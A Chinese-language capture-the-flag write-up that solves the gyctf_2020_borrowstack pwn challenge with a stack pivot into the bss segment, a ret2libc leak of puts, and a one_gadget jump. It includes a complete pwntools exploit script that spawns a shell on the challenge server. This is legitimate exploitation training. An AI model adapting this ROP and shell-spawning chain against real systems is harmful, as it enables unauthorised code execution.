[BUUCTF]PWN——gyctf_2020_borrowstack

gyctf_2020_borrowstack

附件

步骤：

1. 例行检查，64位程序，开启NX保护
   
2. 本地运行一下程序，看看大概的情况
   
3. 64位ida载入，直接从main函数开始看程序，
   
   buf可以溢出0x10字节，只能够覆盖到ret，参数bank在bss段上，所以打算在buf处利用leave指令去劫持栈，让它跳转去bank处，往bank里写入我们的ret2libc的攻击链去获取shell

随便找个leave指令的地址，leave=0x400699

bank在bss段上的地址

设置rdi寄存器的指令地址

exp

from pwn import *
from LibcSearcher import *

r=remote('node3.buuoj.cn',29385)

bank=0x0601080
leave=0x400699
puts_plt=0x04004E0
puts_got=0x0601018
pop_rdi=0x400703
main=0x0400626
ret=0x4004c9

r.recvuntil('u want')
payload='a'*0x60+p64(bank)+p64(leave)
r.send(payload)

r.recvuntil('now!')
payload=p64(ret)*20+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
r.send(payload)
r.recvline()
puts_addr=u64(r.recv(6).ljust(8,'\x00'))
print hex(puts_addr)

libc=LibcSearcher('puts',puts_addr)
libc_base=puts_addr-libc.dump('puts')

one_gadget=libc_base+0x4526a

#system=libc_base+libc.dump('system')
#binsh=libc_base+libc.dump('str_bin_sh')

#payload='a'*(0x60+8)+p64(pop_rdi)+p64(binsh)+p64(system)
payload='a'*(0x60+8)+p64(one_gadget)
r.send(payload)

r.interactive()

在调试写exp的时候遇到了几个坑，总结一下

1. 一开始我利用0x601080去做栈迁移，没有利用成功。百度看了其他师傅的wp后知道了，bank的地址距离got表特别近，是我构造rop的时候增高了栈帧，破坏了got表，因此我们在做栈迁移的时候要把地址相对的抬高些payload=p64(ret)*20+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)里的p64（ret）*20的目的就是抬高栈
   
2. 没法利用泄露的libc去构造system（/bin/sh）获取shell，看了网上的wp，师傅们都是用的one_gadget,利用在线查询网站，将我们泄露的puts地址的最后3位输进去，找到libc版本，下载下来找一下one_gadget的地址，我不是很会看找个汇编，没去找满足条件的，我直接一个一个试的，第二个可以